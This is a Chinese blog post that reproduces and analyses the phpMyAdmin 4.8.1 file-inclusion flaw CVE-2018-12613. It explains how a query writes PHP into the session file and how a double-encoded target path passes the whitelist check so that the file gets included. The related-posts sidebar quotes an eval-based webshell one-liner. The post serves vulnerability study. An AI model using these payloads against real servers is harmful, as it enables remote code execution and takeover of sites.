phpMyAdmin另一种getshell姿势(CVE-2018-12613)

已于 2022-04-17 14:51:27 修改
阅读量2.5k 收藏 1
点赞数
分类专栏: 漏洞复现 WEB安全 文章标签: web安全 php
于 2022-04-17 14:48:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263451/article/details/124229466
版权

我知道phpmyadmin的getshell大概有日志写马和select into outfile两种姿势,最近又新学了一种getshell姿势,赶紧记录一下

思路大概就是我们执行的sql语句会被记录到你的session文件中去,那我们就可以写马到自己的session文件,然后利用远程文件包含漏洞(CVE-2018-12613),导致可以getshell

漏洞复现

环境:
phpmyadmin4.8.1
php 7.2.5

登入后查询select “<?php phpinfo();?>”;

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-687qbR7u-1650177646862)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220417133834856.png)]

这个查询语句会记录到我们的session文件中去

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cCalcJqp-1650177646862)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220417133952007.png)]

那我们利用phpmyadmin的远程文件包含漏洞包含该session文件就可以rce

常见的session文件存在位置
/tmp
/var/lib/php/session
Windows:
C:\WINDOWS\Temp

我们这里是在/tmp目录下

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9L3naFVD-1650177646863)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220417135150356.png)]

利用远程文件包含漏洞payload成功rce

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0PUaE1nf-1650177646863)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220417135315936.png)]

漏洞分析

首先是在index.php的55行一共有5个判断条件,判断成功后就会包含我们传入的变量,现在目标就是让条件都成立

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3FyB9FXV-1650177646864)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220417141800656.png)]

第一个不为空,好说

第二个为字符串,好说

第三个不能以index开头,好说

第四个不能在黑名单里,好说

主要是看第五个,我们得让他返回true

跟进Core::checkPageValidity,这里面一共有三处可以返回true,我们一处一处看

    public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        return false;
    }

首先定义了一个白名单,白名单就是这个

public static $goto_whitelist = array(
        'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
		...
    );

接下来就是判断$page是否在白名单,我们是为了包含其他文件,那这肯定不在白名单里面,所以第一个返回true的不行

那就看第二个返回true的地方,它是将$page中问号前面的截下来并判断是否在白名单里面如果在就返回true,我们可以构造$page为db_sql.php?/…/…/…/…/…/…/…/etc/passwd,这样就可以返回true,从而if判断成功进入if分支,但是include里面是不能有问号的这就导致包含失败,所以第二个返回true的地方不能用

我们继续看第三处返回true的地方

$_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

先对$page解码然后依然将$page中问号前面的截下来判断是否在白名单里面如果在就返回true,那么我们可以构造$page为db_sql.php%253F/…/…/…/…/…/…/…/etc/passwd,其中%253F为问号的二次编码,这样的话返回true从而进入if分支,然后包含db_sql.php%3F/…/…/…/…/…/…/…/etc/passwd,这就可以正确包含到passwd文件了

Getshell

根据phpmyadmin会将用户执行的sql语句写入用户的session文件中,致使我们可以写马进session文件,再通过这个远程文件包含漏洞从而来getshell

参考文献

https://xz.aliyun.com/t/5534

https://vulhub.org/#/environments/phpmyadmin/CVE-2018-12613/

浔阳江头夜送客丶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin 远程文件包含漏洞(CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
phpmyadmin中写马两种思路
goddemon
09-14 2989
一,在网站根目录下 ①查select @@basedir; ②利用into outfile进行写 select '<?php eval($_POST[cmd]); ?>' into outfile 'D:\soft\phpStudy\www\xxx.php';#网站的根目录 二,利用mysql日志写文件 general log 指的是日志保存状态,ON代表开启 OFF代表关闭; general log file 指的是日志的保存路径。 show variables like '%general
phpmyadmin getshell
YouthBelief的博客
11-11 4934
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
【漏洞复现】CVE-2018-12613 phpMyAdmin文件包含getshell
Mr_atopos的博客
05-22 434
该漏洞影响phpMyAdmin 4.8.0-4.8.1版本 checkPageValidity函数对数据的处理逻辑不够严密,利用二次url编码绕过文件包含检测 payload 通过查询在session中添加php语句,再通过文件包含执行 ?target=db_sql.php%253f/…/…/…/…/…/…/…/…/(要包含的文件) target有白名单检测机制,db_sql.php在白名单中 通过?的二次编码成%253f target在检测白名单的时候,会对db_sql.php%253f进行二次u
利用phpmyadmin日志写入一句话木马
m0_68019293的博客
03-15 2664
首先登陆phpMyadmin后,点击sql模块 先用这一句命令查看它是否存在 secure_file_priv 这项功能,要null不一定等于no哦,如果没有就可以利用来写一个webshell 现在写入一句话木马文件,用into outfile函数 加网站下绝对路径,记住哦要把\ 改为/,因为网站的/ 和根目录下的\是不一样的 现在已经成功的写入了一句话木马的文件,这时候就可以用菜刀,蚁剑等工具链接它的文件绝对路径得到它的webshell,这是第一种方式 2 接下来这种呢就是利用日志..
phpmyadmin——提权
weixin_53639243的博客
01-29 497
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。比如 如果是 phpstudy启动的 根据 mysql 安装路径 就可以猜出网站的位置。用于 secur_file_priv 为null 或限定值 不在网页目录时。执行下面的sql语句,创建表并在表中写入一句话木马,在导出到网站的根路径。2.secure_file_priv 不为null 具体描述在下边。general_log_file:日志保存路径。3.要知道网站的绝对路径,写入马才能连接。
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
安装phpMyAdmin,使用into outfile给靶场写入一句话木马
DMXA的博客
10-12 317
通过phpinfo页面中Document_Root参数获取网站绝对路径。通过构建sql写入一句话木马。
利用phpMyAdminwebshell
05-01
利用phpMyAdminwebshell 利用phpMyAdminwebshell
phpmyadmin写入一句话木马】操作详情
最新发布
吉吉的博客
03-16 615
phpmyadmin中写入一句话木马操作
小白也可以看懂的漏洞分析(CVE-2018-12613)
西西弗斯的巨石
05-20 4365
漏洞编号CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用该漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。本篇文章主要侧重于对该漏洞的原理进行分析,并给出利用该漏洞的方法。并介绍了理解该漏洞的背景知识。
PhpMyAdmin后台getshell
qq_50854662的博客
03-14 1070
PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有
WEB安全PHPMyAdmin后台GetShell姿势总结
网络安全知识分享
12-31 4700
PHPMyAdmin后台GetShell姿势总结前言:本地环境:数据库文件导出写入利用条件利用方式数据库全局日志写入利用条件利用方式数据库慢查询日志写入利用条件利用方式CVE-2018-12613利用条件利用方式CVE-2018-19968利用条件利用方式 前言: phpMyAdmin是一个以PHP为基础,以web方式架构在服务器上的MySQL的数据库管理工具。让管理者可以通过Web接口来管理MySQL数据库。因其基于Web的简便易操作的图形化界面备受网站管理者的喜爱。 当我们通过其它各类手段获取到MySQ
phpmyadmin常见getshell的方法
Blue的博客
06-10 2460
1、利用条件2、如果满足以上条件可以直接写shell在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。在高版本的mysql中默认为NULL,就是不让导入和导出解决办法:在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_
CVE-2018-12613 phpmyadmin文件包含getshell连载(三)
PANDA墨森的博客
06-24 633
这是phpmyadmin系列渗透思路的第三篇文章,前面一篇文章阐述了通过慢查询日志getshell,本文将通过文件包含漏洞展开讨论 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13164349.html #001 影响版本 Phpmyadmin 4.8.0/4.8.0.1/4.8.1 #002 漏洞验证利用 http://www.xxx.com/index.php?target=db_sql.php%253f/../../../../../../e.
CVE-2018-12613 --- 本地文件包含造成远程代码执行漏洞复现
wkend的博客
12-26 3272
0x01 了解本地文件包含 LFI(本地文件包含),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 0x02 了解远程代码执行 RCE(远程代码执行),远程...
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
Mikasa
03-16 4429
PHPmyadmin后台文件包含漏洞 环境搭建:因为是新手,完全没有经验。。。弄了好长时间。。一开始想在本机搭建环境,于是上网上下载了一个phpmyadmin,然后下载一个phpMyAdmin-4.8.1实验,但是出现语法错误(心态炸了)。。。。 然后只能够下一个版本低的试试,于是下载了一个2016的phpstudy,然后就想放虚拟机(2003)试试,然后又炸了,因为这个版本的phpstudy需要...
CVE-2016-5734
09-04
CVE-2016-5734是一个针对PHPMyAdmin的漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考提供的链接。如果你想在本地环境中测试该漏洞,可以下载并安装vulhub,并进入/vulhub/phpmyadmin/CVE-2016-5734目录,然后使用提供的命令启动环境。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [buuctf [PHPMYADMIN]CVE-2016-5734](https://blog.csdn.net/qq_36241198/article/details/115017777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现](https://blog.csdn.net/weixin_41924764/article/details/113063083)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值